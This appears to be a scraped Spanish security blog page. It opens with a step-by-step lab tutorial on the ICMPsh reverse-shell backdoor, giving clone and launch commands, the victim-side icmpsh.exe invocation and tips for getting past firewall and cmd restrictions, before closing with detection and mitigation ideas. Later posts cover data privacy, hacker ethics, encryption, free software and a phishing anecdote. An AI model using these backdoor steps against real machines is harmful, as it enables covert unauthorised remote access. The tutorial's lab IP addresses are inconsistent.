Que es ICMPsh? Funcionamiento, detección y mitigacion PASO a PASO. Palabra clave [W1nd0ws_B4ckD00r]

Antes que todo un inmenso saludo, un inmenso HOLA_MUNDO a todos los que se toman el tiempo de leer mis artículos, en verdad espero les sean de utilidad ya que los comparto con todo el animo del mundo, después de las palabras de bienvenida vamos a los que nos toca, explicare paso a paso de forma detallada y sencilla que es y como funciona ICMPsh, asi como la forma de mitigar la vulnerabilidad.

Que es una Shell remota, un backdoor (puerta trasera), una shell de conexión inversa, etc… Pues básicamente vienen a ser lo mismo y la definición mas o menos globalizada es:

Es una conexión remota por lo general no autorizada a un sistema informático o infraestructura de red, dando acceso remoto a dicho sistema.

La verdad no es nada nuevo en el mundo de la seguridad, el concepto sigue siendo el mismo, lo que evoluciona es la forma en la que se consiguen esos accesos, desde el mismo programador de alguna App que troyaniza la misma, hasta un SysAdmin que por razones de comodidad deja una puerta trasera para entrar y reparar cosas de forma remota, en esta entrada quiero presentarles ICMPsh, ya tiene varios años de creada pero la considero uno de los backdoors mas sorprendes por varias razones que mas adelante explicare.

Para explicar el funcionamiento y la forma de mitigar el mismo la entrada estará dividida en dos partes, una sera a modo de explicación de conceptos y otra sera totalmente practica usando un entorno virtualizado.

Vamos por partes…

“Jack el destripador”

Que es ICMP?

ICMP (Internet_Control_Message_Protocol) es un hijo del protocolo TCP/IP y es algo así como el vigilante de la red, ya que se encarga de diagnosticar posibles errores y hace de apoyo a otros protocolos, esta definido en el RFC792 y esta claramente especificada la razón por la que fue creado.

Básicamente este protocolo usa diferentes tipos de mensajes ICMP de acuerdo a la condición o circunstancia que sean requeridas. Para entenderlo de una forma un poco sencilla podríamos decir que un paquete ICMP se encapsula dentro de un paquete IP, la estructura seria algo así:

estructura ICMP

En donde vemos claramente 20 bytes (160 bits) para el encabezo IP donde tenemos como campos importantes la direcciones IP de Origen/Destino, pues dentro de ese paquete a modo de sub protocolo esta el paquete ICMP que puede ser de 8 bytes (64bits) en adelante dependiendo el payload que lleve.

Bien en esta entrega vamos a enfocarnos en el campo “Dirección IP origen”“Dirección IP destino” del encabezado IP y en el campo “Tipo de mensaje” del encabezado ICMP

Si fueron lo suficientemente temerarios y le dieron click al enlace que habla de los tipos de paquetes ICMP habrán notado la cantidad abrumadora de tipos de mensajes que puede llevar un paquete ICMP, pero en esta entrega solo nos fijaremos en los tipos de mensaje 8 (Echo Solicitud de eco) y y tipo de mensaje 0 (Echo reply respuesta de eco)

Para comprender mejor el funcionamiento de ICMP vamos a usarlo y analizar las cabeceras con Wireshark, para estos fines tengo el siguiente laboratorio:

Maquina virtual (Windows 7) [Victima] – 10.0.0.14/24 adaptador de red en modo puente

Maquina física (Debian 8) [Atacante] – 10.0.0.5/24

Hagamos un ping normal a la maquina virtual:

ping10004

Ping a la maquina virtual 10.0.0.4

Muy bien ahora vayámonos al Wireshark y veamos que a capturado el tiburón…

capturaping

Ummm interesante, pero porque si solo fueron 10 intentos de ping tenemos 20 capturas en Wireshark?, pues por cada intento de ping (Echo tipo de mensaje 8) tenemos una respuesta (Echo reply tipo de mensaje 0), lo que según las matemáticas dan 10 solicitudes  + 10 respuestas = 20 capturas, y si analizamos un paquete en detalle veremos lo siguiente:

detallerequest

 

Vemos en el encabezado las direcciones de origen y destino en Type alcanzamos a ver un numero 8 que como hemos dicho corresponde a una solicitud de echo (Echo request), y entonces donde esta la respuesta a esta solicitud? pues solo hay que analizar el siguiente paquete:

detalle reply

y del mismo modo si el encabezado vemos las dirección IP de origen y destino, así como el tipo de mensaje 0 (Echo reply)

Bueno, esta es la forma en que normalmente funciona ICMP, en verdad no quería caer en explicaciones tan complicadas, pero si vamos a comprender algo tenemos que hacerlo bien, ademas el titulo dice PASO a PASO, no esperaran un breve paseo verdad?

Ok entendido, pero de donde sale ICMPsh?

Pues precisamente para mi hackear significa llevar las tecnologías mas allá de las fronteras para las que fueron creadas, empujarlas un poco mas de su propósito, realmente ya existían otras herramientas para establecer conexiones remotas pero era necesario tener privilegios administrativos para su ejecución y aquí es donde llega Leidecker y escribe una genial herramienta llamada ICMPsh que a diferencia de otras no necesitaba tener dichos permisos, haciéndose mas limpia y elegante de utilizar, poco después Bernardo Damele la llevo a Python y Nico la compilo para C y Pearl, a ellos el credito y el respeto de la comunidad por su trabajo.

Como todos los backdoor esta herramienta consta de dos partes, una es el Master que es multiplataforma, es decir podemos hacerlo funcionar en tanto en Windows como en sistemas Unix, y la otra es el Slave que funciona solamente en sistemas Windows, hasta ahora en todas sus versiones, como instalare el Master en mi sistema Debian, clonare el repositorio y lo haré correr desde la terminal con los siguientes comando:

sudo apt-get install python-impacket              #Librería necesaria
git clone https://github.com/inquisb/icmpsh.git   #Clonamos el directorio
cd icmpsh/                                        #Nos movemos al directorio

Una vez nos posicionamos en el directorio tenemos varias formas de lanzar la herramienta, una es ejecutando el script run.sh la cual es mas bonito y todo y sale una interfaz dándote la bienvenida y pidiéndote amablemente la dirección IP de la victima, etc…

runsh

La cual esta muy bonita la verdad pero prefiero tirar un comando por mi cuenta en la terminal, utilizando el verdadero código detrás de la herramienta..

lanzamiento

Esto pone mi maquina a la escucha esperando conexiones entrantes desde la 10.0.0.15, pero como sabrán no entrara ninguna conexión si no conseguimos ejecutar icmpsh.exe en la victima con los parámetros adecuados, así que el como se los dejare a ustedes esto exclusivamente didáctico, así que continuamos. En la maquina victima navegamos hasta el directorio donde tenemos icmpsh (en mi caso lo deje en el Desktop)

navegar y ejecutar

y ejecutamos:

icmpsh.exe -t 10.0.0.14 -d 500 -b 30 -s 128

Donde:

-t es la dirección ip del atacante con la que queremos conectar
-d es el delay en milisegundos entre peticiones                                                                              -b es el numero limite de solicitudes sin responder antes de cerrar la conexión                     -s Es el tamaño máximo de data que podemos enviar en cada petición

Luego de esto solo es esperar la conexión con una taza de café…

conectado

A todo esto hay que aclarar que tengo wireshark detrás monitoreando las interfaces con un filtro icmp para que solo veas esas peticiones, así que para probar que tenemos una shell remota (aunque es obvio la estamos viendo en la terminal) vamos a lanzar un inofensivo “dir” para listar los directorios en la maquina remota:

dir

paquete ICMP con el comando DIR

Recuerdan que mas arriba los paquetes ICMP tipo 0 y 8 llevaban 48 bytes de data? Eso porque el payload normalmente es el abecedario y los números del 0 al 9, pero en este caso solamente vemos 4 byte y se puede ver en el payload el comando que acabo de mandar, este comando genera al conectar con el Slave de icmpsh me devuelve otro paquete que luce así:

respuestay advertencia

Con un payload de 148 bytes y el listado de los directorios y volúmenes en la maquina comprometida, mostrándome en mi pantalla esto:

un simple dir

Y así es como me hago de una shell remota en una maquina con cualquier versión de windows, y quizás muchos se pregunten:

Pero que hay del firewall, y las restricciones administrativas para los usuarios, los antivirus, etc….?

Y la respuesta es:

hltpgs

El asunto es que como el payload viaja por un protocolo que todos los sistemas de proteccion consideran seguro ninguno se preocupa en bloquear la amenaza, no se necesitan privilegios de administrador para ejecutar el slave, si el admin bloquea el uso del cmd igual pueden escribirse un .txt y hacerlo .bat (de hecho en el directorio de la maquina virtual me hice unos cuantos para probar y funcionan sin problemas), entonces viene aqui la gran interrogante…

Como protegerse de icmpsh.

Bien, veamos la captura de cuando solicite la lista de directorios en la maquina comprometida:

respuestay advertencia

Si en el comportamiento normal de un paquete ICMP 8 & 0 el payload suele ser de 48 bytes, podemos crear una alerta en wireshark para cualquier tamaño superior a los 48 bytes llame un script (previamente LUA instalado claro) que genere una alerta….

Un momento pero se puede ajustar el tamaño del buffer de data y lo que haria seria picar el payload en trocitos y pasarlo de poco en poco para que no genere alertas…. Joder…!!! yo contra mi mismo.

Ya en serio, esto podría mitigarse fácilmente creando un ACL que permita los mensajes ICMP desde una sola maquina (la del administrador de la red), en realidad es sencillo defenderse, pero es un ataque que generalmente uno no espera. Otra opción seria instalar algun IDS/IPS como Snort y configurar la detección de payloads para que examine que el payload de ICMP lleve lo que deba llevar.

Gracias por su tiempo en leerme, espero les guste la entrada, por favor compartan y ayúdenme a llegar a mas gente, abajo les dejo los enlaces de interés.

 

Enlaces de interés.

ICMPSH Git

IDS/IPS Snort

Lua Wireshark

 

 

Anuncios

¿Que tanta información dejas en la red?

Es un tema poco tratado en la red, es un tema poco tratado en las universidades escuelas e incluso en los grupos de debates locales, pero que si lo analizamos tiene una importancia muy grande y de gran impacto en nuestras vidas digitales de hoy día, hoy quiero escribir sobre:

  • Que tanta información dejamos en la red.
  • Como se usa esta información.
  • De que forma se genera dicha información.

Primero, como dijo ese gran filosofo que no dijo nada porque murió antes de poder decir lo que iba a decir:

Empecemos por el principio.

¿Que es un dato?

Ahora bien, que viene siendo un dato? Un dato es una representación simbólica de un hecho, de un proceso, pueden describir sucesos, condición de algo, estado, un dato puede ser un valor numérico, alfabético que describa algún atributo sobre algo.

Es decir cada movimiento que hacemos, cada acción, hecho al azar de la naturaleza, cada acontecimiento, cada observación genera un dato, a diario estamos generando datos, las 24 horas del día, cada día de nuestra vida e incluso después de la muerte nuestros cuerpos seguirán generando datos (que tiempo tarda en descomponerse el cuerpo, cuanto crecen las uñas, etc..)

El problema es que un dato por si solo no genera información.

¿Que es la información?

La razón por la que un dato no genera información es la siguiente, según la wikipedia la información es un conjunto organizado de datos procesados que constituye un mensaje que cambia el estado de conocimiento de un sujeto o sistema que recibe dicho mensaje.

Notan la palabra mágica en negritas…? Datos procesados


Podríamos pasarnos una vida entera generando datos aleatorios y sin ningún sentido aparente hasta que aplicamos un proceso que nos permita darle sentido a esos datos y convertirlos en información.

datos-informacion1

Veamos un ejemplo sencillo de datos que se transforman en información.

Entro al supermercado a comprar vino, me paro frente al estantería y solo miro y analizo los vinos que me quedan a la altura de la mirada, muy vagamente miro las botellas que están en la parte inferior y muy vagamente miro las botellas que me quedan muy altas, asi que sin mas complicación tomo una botella de las que están a la altura media, paso por caja, la pago y me voy.

Esta acción ya ha generado en un dato, pero por si sola no nos dice nada, entonces alguien viene y se da cuenta por observación de que después de mi 10 personas siguieron el mismo patrón y entonces consigue la información de que los productos colocados a la altura de los ojos venden mas que los que están en la parte inferior o superior de la estantería.

Esto solo es un ejemplo minúsculo en comparación con los datos que genera nuestra vida diaria, ahora llevemos eso al campo informático, donde tenemos una vida digital, tenemos identidad, y pensemos por un momento en las toneladas y toneladas de migas de pan que dejamos mientras usamos Internet.

Pensemos por un momento en las toneladas y toneladas de migas de pan que dejamos mientras usamos Internet.

¿Como se recogen nuestros datos en la red?

Existen 3 métodos principales por los cuales pueden ser recolectados estos datos y son:

Voluntaria data(Data voluntaria).

Como su nombre lo indica es data que compartimos a voluntad propia, en esta parte entra lo de compartir tu nombre, tu apellido, tu estado civil, tu edad, tu sexo, enfermedades que has sufrido, las películas que te gustan, los libros que has leído, etc…

Es el tipo de datos con el que solemos llenar los formularios online del hospital, del Facebook, de Google, de los contratos de servicios, formularios de inscripción de estudios, etc…

La información que se extrae de esta data no siempre es real, es decir al ser compartida voluntariamente podemos mentir y proporcionar algo que no es cierto, como ocultar nuestros gustos por los libros, preferencia religiosa, preferencia sexual, vida social, etc… y es justo cuando entra el siguiente método.

Observed Data(Data observada).

Aquí la cosa es mas cabrona, ya que es información recolectada a partir de observación en nuestro comportamiento en la red, cuando entramos en la red hay unos paparazzis llamados algoritmos que recolectan nuestros hábitos de navegación, nuestras preferencias al comprar un producto u otro, el tiempo que dedicamos a estar conectados, las horas del día a las que nos conectamos, cuales días del mes es cuando mas compramos, se toman en cuenta nuestras búsquedas en Google, los Likes que damos en Facebook y en Instagram, se analizan los correos que enviamos, se buscan patrones y tantas cosas mas.

Hay toda una industria allá afuera que nos conoce incluso mas que nosotros mismos, nuestros smartphones recolectan data 24 horas al día (incluso apagados) y la envían a servidores dedicados exclusivamente al procesamiento de estos datos para convertirlos en información. Pero cuando la información observada ya no es suficiente entonces llega la mas perversa de todas.

Deducted Data (Data deducida)

Imaginemos que un robot gigantesco con largos tentáculo podría utilizar la data compartida voluntariamente y junto a la data observada sacar un tercer tipo de data llamada “Data deducida”, pues si lo llevamos al mundo real no crean que estamos muy lejos de la realidad ya que la inteligencia artificial, el Big Data, Business Inteligence y el uso de software analítico son capaces no solo de conocernos mejores que nosotros mismos, sino que son capaces de anticipar nuestro comportamiento sobre el tiempo, es decir los algoritmos que son los nuevos dueños del mundo ya son capaces de adivinar nuestra tendencia en el futuro, de ver mas allá de nuestras acciones y descubrir cosas muy intimas como tu verdadera preferencia sexual, tu inclinación política, tu inclinación religiosa, rasgos de personalidad entre muchas cosas mas.

En esta nueva era tecnológica la información es el nuevo petroleo y quien la tenga y la controle sera el dueño exclusivo del mundo.

Sabias que…

1.-Google actualiza el algoritmo que usa en su buscador cerca de 500 veces al año lo que equivale a una actualización cada 17 horas.

2.-Facebook toma en cuenta incluso el tiempo que tarda el cursor sobre el botoncito de “Me gusta” antes de clickear.

3.-Gracias a la tecnología CBT (Cross Browser Tracking) la mayoría de los websites pueden seguirte aunque cambies de navegador, de dirección IP e incluso navegando de modo incógnito.

Lectura recomendada:
Cross Browser Tracking

Inteligencia artificial & Big Data

Algoritmos que gobiernan el mundo.

 

La ética como parte del espíritu hacker.

Hace un tiempo un conocido compañero de la comunidad underc0de redacto y compartió esto con nosotros, y la verdad me llego tan profundo que de cuando en vez me gusta releer esta exquisitez. Hoy quiero compartirlo con ustedes esperando sea de su agrado, y donde quieras que te encuentres Crazykade, desde aquí te mando un abrazo.

Hack-your-Password

 

LA CONDENA SOCIAL:

Una vez un amigo me dijo: “Me da miedo que sepas tanto sobre informática, me da miedo que te metas en mi ordenador, en mi casilla de correo electrónico y en mi Facebook”. Pasé mucho tiempo reflexionando sobre el significado de esas palabras. Finalmente pude ver la luz y me di cuenta de algo que cambió mi forma de pensar: “Para el común de los mortales, un hacker es un delincuente”.

Asombrado por este descubrimiento, comencé a tratar de descubrir la raíz de estos (errados) preconceptos. De esta forma, me di cuenta que el problema más grave no es que se le llame delincuente a un hacker, sino, y por el contrario, que se le llame hacker a un delincuente.

LA ÉTICA DEL HACKER:

De la misma forma que un cerrajero, basado en años de estudio, trabajo y experiencia, conoce la forma de abrir cualquier cerradura, (lo que supondría un riesgo de seguridad enorme para la sociedad), un hacker también conoce formas y métodos de vulnerar y abrir las cerraduras electrónicas. Es en este estadio en donde entra en juego la famosa “Ética Hacker”.

Haciendo uso de sus conocimientos adquiridos a priori, el cerrajero podría tranquilamente deambular por la ciudad por las noches, mientras todo el mundo duerme, abriendo las puertas de las casas y realizando hurtos. En tal caso, ya no sería un simple cerrajero, sino que se convertiría en un delincuente. En nuestro mundo de unos y ceros pasa lo mismo. Un hacker tranquilamente podría dedicarse a vulnerar empresas, personas, entidades haciendo uso de los conocimientos que posee sobre muchas y variadas ramas de las ciencias computacionales, pero de ser así, estaríamos hablando nuevamente de un delincuente, digital, pero delincuente al fin.

Para referirse a tales delincuentes, y así diferenciarlos de los verdaderos hackers, el filósofo finlandés Pekka Himanen, acuñó la palabra “Cracker” en su obra: “La ética del hacker y el espíritu de la era de la información”. También señaló que el término hacker no debe ser utilizado única y exclusivamente dentro del mundo tecnológico, sino abrir sus horizontes hacia otros ambientes:

“En el centro de nuestra era tecnológica se hallan unas personas que se autodenominan hackers. Se definen a sí mismos como personas que se dedican a programar de manera apasionada y creen que es un deber para ellos compartir la información y elaborar software gratuito. No hay que confundirlos con los crackers, los usuarios destructivos cuyo objetivo es el de crear virus e introducirse en otros sistemas: un hacker es un experto o un entusiasta de cualquier tipo que puede dedicarse o no a la informática.”

A finales de los años 50’s, cuando todo lo que tenemos hoy en materia informática y de telecomunicaciones, estaba aún en pañales, cierto grupo de gente, en los laboratorios de inteligencia artificial del MIT, empezaron a debatir sobre los principios éticos y morales a los que, teóricamente, debería responder todo este mundillo que de a poco iba naciendo. El periodista Steven Levy en su ensayo: “Hackers: Héroes de la revolución computacional”, publicado en 1984, describe ilustradamente cómo era el ambiente por aquel entonces. También enumera los principios morales antes mencionados. Entre ellos se habla de pasión, libertad, conciencia social, transparencia de la información, libre acceso a la misma, curiosidad, creatividad e interés.

LOS HACKERS EXISTEN Y ESTÁN PARA AYUDARTE:

Si tienes la suerte de conocer un hacker, descubrirás por ti mismo que, sin dudas, es una persona extraña. Probablemente retraída y de aspecto desprolijo. Claro que no existe un estereotipo de hacker, pero me baso en mi experiencia en hackmeetings (reuniones de hackers) para describirlos a grandes rasgos. No te asustes ni te intimides, suelen ser amistosos. Si tienes la posibilidad, acércate, comunícate, pregúntale cosas, pregúntale qué significa el hacking para él, por qué lo hace, cuánto tiempo lleva en esto, seguramente te sorprenderá más de una respuesta.

Los hacker están ahí, pero no para atacarnos y hacerse con nuestro perfil de Facebook, como muchos creen, sino para cuidarnos de los delincuentes que deambulan por la red de redes. Lo único que ellos necesitan de nosotros, es que cambiemos los conceptos que tenemos en nuestra mente y que los medios de comunicación, que de esto no saben nada, se implican en exponerlos como válidos y verdaderos día a día.

Un hacker no es un delincuente y un delincuente no es un hacker. Teniendo esto bien en claro, podremos discernir entre lo verdadero y lo falso cuando leamos en un diario o veamos en un noticiero un titular como “Hacker robó x cantidad de dinero de tal banco” o “Grupo de hackers se hacen con el control de más de 1000 cuentas de redes sociales”. De hecho, las noticias de los verdaderos hackers raramente las verán en un noticiero. ¿Alguna vez vieron en algún medio una noticia del estilo: “Hackers desarrollan un nuevo algoritmo de encriptación para comunicaciones inalámbricas en remplazo del antiguo y vulnerado WEP”?

Si logramos cambiar y ordenar los conceptos que tenemos sobre ciber delincuencia y hacking ético, podremos observar de un modo nuevo y diferente a Internet y al mundo de las comunicaciones digitales. Underc0de y quienes lo integran, confían y apoyan el hacking ético. Nos hemos propuesto educar al respecto tanto a los más nuevos, como a todo aquel que quiera comprender cómo funciona el underground digital. Nuestros tutoriales, cursos, competencias, artículos, recursos y servicios, están 100% orientados a suscitar la libertad de espíritu y de pensamiento en todo aquel que quiera un mundo digital libre, seguro y con información accesible para todos. A su vez, Underc0de y quienes lo hacemos posible día a día, condenamos el ciber crimen, la delincuencia digital en cualquiera de sus formas y rostros y toda actividad ilícita que de una u otra manera afecte a la integridad de un tercero sea esta física o digital y este sea persona física o entidad.

Espero que este artículo sea capaz de tocar al menos un corazón de alguien que lo lea. Si es así, mi trabajo estará cumplido. Me despido agradeciendo a Underc0de por el espacio para publicar y especialmente a mi amigo ANTRAX por animarme a escribir. Happy Hacking

CrazyKade

Cifrado para tu vida digital

Gracias a los cielos desde hace unos años la privacidad de los usuarios ha tomado un lugar importante en todos los ámbitos del día a día, ya que en mayor o menor medida todos nos preocupamos de que nuestra privacidad sea respetada (ó algo parecido) y para ello se han creado muchas técnicas que nos facilitan la tarea de asegurar nuestra vida digital.

privacy

Entre las tantas tecnologías que buscan nuestra seguridad existe una muy particular conocida como cifrado, el cifrado es asegurar que solamente las personas correctas puedan entender el contenido de un mensaje, un archivo ó un flujo de datos. El cifrado es básicamente usado en dos áreas de la informática:

  • Comunicaciones: Transmisión segura de datos, cifrado punto a punto, etc…
  • Almacenamiento: Cifrado de los datos contenidos en discos duros, smartphones, pendrives, discos en la nube, etc…

El cifrado es asegurar que solamente las personas correctas puedan entender el contenido de un mensaje, un archivo ó un flujo de datos

Imagina por un segundo que alguien ha robado tu portátil…. Seguramente en los primeros 30 segundos solamente tomes en cuenta el precio del equipo y el sacrificio que quizás te costo comprarlo, pero pasado unos minutos empiezas a recordar esos archivos, esas fotos y demás cosas que no quisieras que nadie mas vea…

21843175

Si eres de los que creen que por ponerle password a tu cuenta estas totalmente protegido siento decepcionarte ya que es tan sencillo como usar algun LiveCD ó conectar tu disco duro a otro equipo y así igual podre ver todo lo que en el hayas guardado (incluso si ya lo has borrado de la papelera).

¿Que sentirías ahora?

Pues que tal si hubieras cifrado tu disco?, de ser así solo deberías preocuparte del aparato pero jamas de la información, ya que el cifrado convierte esto:

Hola mundo.

en esto:

ugUZLlQ5C4Gk4QMf8Y1ChUHrXPFEn9i6CFkcJOhCP8awhl352u0esgsOZrMes0W3

¿Pero como es que funciona eso del cifrado?

El cifrado se logra a base de cálculos matemáticos, funciones de cifrado, algoritmos y muchas cosas mas complejas, pero digamos que para explicarlo solo necesitan conocer el concepto de llave de cifrado y algoritmo de cifrado.

  • Llave de cifrado: Es básicamente el elemento que definirá el resultado del cifrado y que te dará esa exclusividad de que solo tu y los elegidos puedan entender lo que hay escrito en tu disco, generalmente la llave de cifrado suele ser una contraseña alfanumérica a partir de la cual se cifrara el contenido, pero hoy día ya puede ser cualquier cosa, (actividad del disco duro, hora/fecha/localización, movimientos del ratón, cualquier otro parámetro que pueda generarse de forma aleatoria suele funcionar).
  • Algoritmo de cifrado: Es la receta  matemática con la que a partir de la llave de cifrado se convierte un “Hola mundo” en un conjunto de letras y números sin sentido aparente.

Cito textualmente al wikipedia:

Un algoritmo bien diseñado debe producir, a partir del mismo texto plano, dos textos cifrados completamente diferentes si se usa una clave distinta.

En mi ejemplo pasado utilice la llave “cloudswx” para cifrar y así conseguí esto:

ugUZLlQ5C4Gk4QMf8Y1ChUHrXPFEn9i6CFkcJOhCP8awhl352u0esgsOZrMes0W3

Pero si hubiese utilizado otra llave como por ejemplo “sequre” entonces el resultado hubiese sido este:

mQgIpI/eE2tDLbWPQ4eRyvomNit313jmuYXJSRvf7ADYOzRs2S65kdfmtzDgIPG/

¿Notan diferencias?

Cada llave de cifrado generara un hash distinto y único y para que alguien mas pueda leer ese “Hola mundo.” deberá tener obligatoriamente esa llave.

Vamos a cifrar nuestros discos duros.

Si utilizas windows ya tienes por defecto una herramienta llamada BitLocker que te dará todo pan servido en unos cuantos clicks.

Como cifrar tu disco paso a paso con BitLocker.

Si en cambio utilizas alguna distro Linux bastaría con seleccionar el cifrado durante la instalación del sistema, ó bien si lo hemos decidido recién ahora les recomiendo este articulo sencillo de Diego Samuel:

Como cifrar particiones en Debian y/ó derivados.

Con estas sencillas medidas podremos estar un poco mas tranquilos de que nadie mas podra ver nuestras cosas y que se respetara la privacidad.

Eso es todo por ahora hermanos, nos vemos en una próxima entrada.

Como vivir 100% con software libre y no morir en el intento.

Saludos queridos blogueros, en esta ocasión quise escribir algo menos técnico y mas de nobles ideales, pero como siempre, esto es un asunto de proporciones ya que hablare de aspectos técnicos y de ideales, así que vamos allá.

A estas alturas todos deben saber que soy un entusiasta del software libre, tengo mas de 8 años como usuario y mas de 2 años usándolo en mi trabajo de día a día, por tanto lo defiendo, lo difundo y aprovecho cada oportunidad para sumar usuarios al software libre, y es posible que mas de uno me pregunte:

¿Y por que quieres sumar gente al software libre?

Pues por la sencilla razón de que me gusta imaginar un mundo mejor, sin limitantes ni ataduras, un mundo libre, y como soy informático lo ideal es luchar desde mi campo de batalla, así que lo mio es defender y apoyar el software libre, pero vamos a definir breve que es eso de software libre.

1.- ¿Que es el software libre?

Podriamos tirar de Wikipedia y leer que:

El término software libre refiere el conjunto de software que por elección manifiesta de su autor, puede ser copiado, estudiado, modificado, utilizado libremente con cualquier fin y redistribuido con o sin cambios o mejoras.

– Un momento… estas diciendo que el creador del software permite libremente que su obra sea copiada, estudiada, modificada?

– Pues sip, esa es la idea, sin mas ni mas, solo eso.

Esto puede sonar muy sencillo en principio, pero si analizan el fondo del asunto se darán cuenta de que en esencia es un efecto bola de nieve donde poco a poco miles y miles de entusiastas hacen cosas maravillosas y las ponen a tu disposición de forma gratuita y desinteresada, lo que motiva el aprendizaje, y el mejoramiento de las cosas. Ejemplos de software libre existen cientos, pero si debemos mencionar algunos bastaria con decir: Firefox, Thunderbird, VLC, Apache, Linux, Wireshark, Chromium, entre otros tantos.

Y estoy seguro que quizás mas de uno me diga:

Ok, cl0udswx, tienes razón y el software libre es genial, pero es que me siento mas cómodo con lo que uso actualmente.

Totalmente de acuerdo con tu decisión, si te sientes cómodo con lo que haces y la forma en que lo haces pues te invito a quedarte en tu zona de confort, donde todo funciona (no sabrás jamas como funciona pero lo hace), pero si ven lo mismo que yo, si sienten lo mismo, y si quieren buscar lo mismo que yo les pido que se paren junto a mí en un año afuera del Parlamento y…

Un momento…

vendetta_07

Ese es el dialogo de V for Vendetta…

La idea es que si en cambio les gusta aprender, colaborar y mejorar las cosas, entonces sin dudas el software libre es para ti, eres libre de ver como funcionan las cosas, libre de modificarlas a tu gusto, libre de compartirlas con tus modificaciones ó sin ellas, libre… libre… libre… Esas palabras se siguen haciendo eco en mi mente, pero como todas las transiciones son un poco dolorosas te comparto mi idea de como hacerlo y no morir en el intento.

Como vivir en el mundo del Software libre sin dejar de respirar.

Muy bien, chicos, hace unos días le decía a un compañero de trabajo cansado de formatear su laptop que usara alguna distro Linux y se olvidara de los virus, de desfragmentar el disco y de formatear cada cierto tiempo, como es de esperar me mando a la M#$#&& diciendo que eso era muy complicado, días mas tarde le invite a mi casa a compartir algunas cervezas y cuando el llego a casa encontró a mi hija de 10 años usando un portátil con Linux Mint, el me miro y me sonrío y yo hice igual, simplemente le dije:

Mi hija tiene 10 años y usa Linux para sus deberes, escuchar musica, visitar el youtube, etc… y nunca se ha quejado.

Así que le he convencido y al momento de escribir este articulo le estoy instalando Linux Mint 17.2 con escritorio Cinnamon (la cual recomiendo para los que se inician en Linux) en su flamante Laptop y en parte le escribo este articulo por el y para los que temen dar el paso de instalar una distro Linux.

La mayoría de las distribuciones vienen con toda una suite de software que te ayudara a desenvolverte de forma normal en tu día a día, así que a ver:

Navegación.

  • Firefox
  • Chromium
  • Iceweasel

Oficina

  • Openoffice
  • LibreOffice

Descargas

  • Transmission
  • Jdownloader
  • wget (esto para cuando esten mas avanzados)

Entretenimiento

  • VLC
  • Rythmbox
  • MOCP

Y todo esto sin tirar un solo comando… Solo dando clic aquí y clic allá…

Ventajas?Pues podrian ser varias…

  1. Mejor desempeño.
  2. Olvida los virus.
  3. Olvida desfragmentar.
  4. Olvida formatear.
  5. Olvida crackear programas. (en este mundo eso no es necesario)
  6. Siéntete mejor persona.

Por ahora eso es todo, les invito a compartir con los demás a seguirme en twitter y a que se suscriban al blog para que reciban en sus correos todos mis artículos.

Ahhhh también a que se hagan en las filas del software libre, no se arrepentirán.

Saludos de cl0udswx

Ataque phising + web exploit usando falsos correos de whasapp.

Buenas noches lectores, pues la vedad el día de hoy no tenia pensado escribir nada, mas bien esta estudiando cuando de repente me dio por limpiar un poco la basura de mis cuentas de correo, cuando de repente…

BAAAAMMMM!!!!

threat

Ahí estaba un correo de certeros colores diciéndome que había recibido una nota de voz por Whatsapp…

La verdad es que se ve muy autentico y quzas hubiese funcionado con algún usuario promedio que no repara en riesgos y que solo hubiese atinado a decir:

“Ahora me mandan las notas de voz a mi correo, que eficiente se han puesto los de whatsapp”

Pero en mi caso no fue tan sencillo, ya que simplemente copie el enlace al que redirigía el famoso botón de “autoplay” y lo copie en un .txt con el fin de averiguar que tan elaborado iba este ataque, quizás algunos piensen pero cl0udswx, para que copiar el enlace si al visitarlo te vas a exponer y mi respuesta es que yo les quiero tanto que prefiero exponerme yo a que sean expuestos ustedes (esa es la versión políticamente correcta) la verdad es que tengo una maquina virtual para estas cosas, desde puedo probar enlaces, ejecutables y todo en un ambiente controlado (sandbox, firewall, IPS, y esas cosas).

Así que salte a mi maquina virtual y abrí el navegador mas odiado por todos Internet Explorer (a veces necesitamos cosas vulnerables para probar vulnerabilidades) pegue mi enlace y voila!!

Farmacia canadiense con dominios de Rumania?

Farmacia canadiense con dominios de Rumania?

Ummm… No es nada… Apaguen las alarmas…

En serio?

Noooo!!!

Es muy curioso que una pagina para vender medicinas por parte de una farmacia online canadiense tenga un dominio de Rumanía, no se a ustedes pero a mi me parece muy raro, asi que tome el CMD de Windows y lance un:

netsat -a

Para ver como iban las cosas con las peticiones y las conexiones TCP, y mi sorpresa fue aun mayor cuando encontré esto:

netstatY que son todas peticiones http desde mi maquina hacia ese extraño servidor? generalmente los puertos de origen son aleatorios en una petición http, pero si se realizan de forma sucesivamente rapida estos se suceden en cierto orden, como podemos ver están todos en el rango de los 1200 y de 65000 puertos TCP no es nada aleatorio que estén dentro de ese rango.

Y de repente me llego la imagen sublime de un ataque web exploit, en el que se nos hace visitar una pagina infectada para aprovecharse de algún exploit en nuestro navegador, algún plugin obsoleto también les vendría bien (desde cuando no actualizas el java?), quizas alguna vulnerabilidad en el flashplayer (desde cuando no actualizas tu flashplayer?).

Un ataque sencillo que por estadística sigue enganchando a los usuarios y que por tales motivos los sitios web en combinación con malos hábitos de navegación siguen siendo uno de los mayores vectores de infección, aquí les comparto algunas medidas que les ayudaran a protegerse.

  • Rápidos con la mente, lentos con el dedo. Significa pensar bien las cosas antes de aceptarlas y visitar sitios de dudosa procedencia.
  • Usa tu navegador como todo un experto en seguridad, algunos diran pero como “C#ñ$!!” hago eso, pues resulta que puedes desactivar JAVA y flashplayer para navegar y solo activarlo en caso de que alguna aplicación así lo requiera (y te preguntara asi que recuerda la regla numero 1).
  • Mantén tu software actualizado, sonara repetitivo pero es así.
  • Usa alguna suite de software que tenga antivirus, anti-malware, protección contra phishing y spam, actualizaciones en segundo plano, etc.. Yo suelo recomendar 360 Security.

Eso es todo por ahora amigos, y como les dije, la verdad no tenia pensado escribir pero me gusto tanto la notificación falsa de los chicos de whatsapp que al final no me resistí.

Saludos.